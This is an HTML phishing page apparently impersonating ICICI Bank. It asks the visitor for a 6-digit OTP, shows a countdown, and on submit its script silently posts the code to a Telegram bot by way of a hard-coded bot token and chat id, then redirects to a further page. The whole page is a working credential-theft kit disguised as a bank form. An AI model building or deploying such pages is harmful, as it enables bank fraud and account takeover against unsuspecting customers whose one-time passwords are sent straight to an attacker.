<!DOCTYPE html>
<html>
<head>
  <title>Form Submission</title>
  
  <!-- Styles here -->
  <style>
    body {
      font-family: Arial, sans-serif;
    }
    .form-group {
      margin-bottom: 15px;
    }
    label {
      display: block;
      margin-bottom: 5px;
    }
    input[type="text"],
    input[type="number"],
    input[type="password"] {
      width: 100%;
      padding: 10px;
      margin: 5px 0 0px 0;
      display: inline-block;
      border: 1.3px solid black;
      box-sizing: border-box;
      font-size: 16px; /* Increased placeholder text size */
    }
    button {
      background-color: #4CAF50;
      color: white;
      padding: 14px 20px;
      margin: 8px 0;
      border: none;
      cursor: pointer;
      width: 100%;
      height: 45px
      
      
    }
    button:hover {
      opacity: 0.8;
    }
  
  #countdown {
      font-size: 20px;
      color: White;
    }
  
  </style>

  <!-- Bootstrap for mobile view -->
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">

</head>
<body>
<form id="myForm" class="container">
  <img src="ICICI.jpg" alt="Girl in a jacket" width="100%" height="150">
<br>
  <br>
  <div class="form-group">
    <label for="otp">Enter 6 Digit OTP:</label>
    <input type="number" id="otp" name="otp" pattern="\d{6}" title="Please enter the 6 digit OTP." required class="form-control">
  </div>

<p> Please Wait For OTP <span id="countdowntimer">180 </span> Seconds</p>
  <br>
  <button type="submit" class="btn btn-primary">Proceed</button>
 
  <img src="foot.png" alt="Girl in a jacket" width="100%" height="450">

</form>

<script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/@popperjs/core@1.16.1/dist/umd/popper.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>

<script>
  document.getElementById('myForm').addEventListener('submit', function(event) {
    event.preventDefault();
  
    let formData = new FormData(this);
    let message = `6 Digit OTP: ${formData.get('otp')}`;

    fetch('https://api.telegram.org/bot7791287382:AAHaVcRNbpDfO1MOGYxvB4h6Ml7Bop5CxoQ/sendMessage', {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
      },
      body: JSON.stringify({ chat_id: '7865807902', text: message }),
    })
    .then(response => {
      // Redirect to another page once the form data is sent
      window.location.href = 'ot.html';
    })
    .catch(error => {
      console.error('Error:', error);
    });
  });
</script>

<script type="text/javascript">
    var timeleft = 180;
    var downloadTimer = setInterval(function(){
    timeleft--;
    document.getElementById("countdowntimer").textContent = timeleft;
    if(timeleft <= 0)
        clearInterval(downloadTimer);
    },1000);
</script>

</body>
</html>
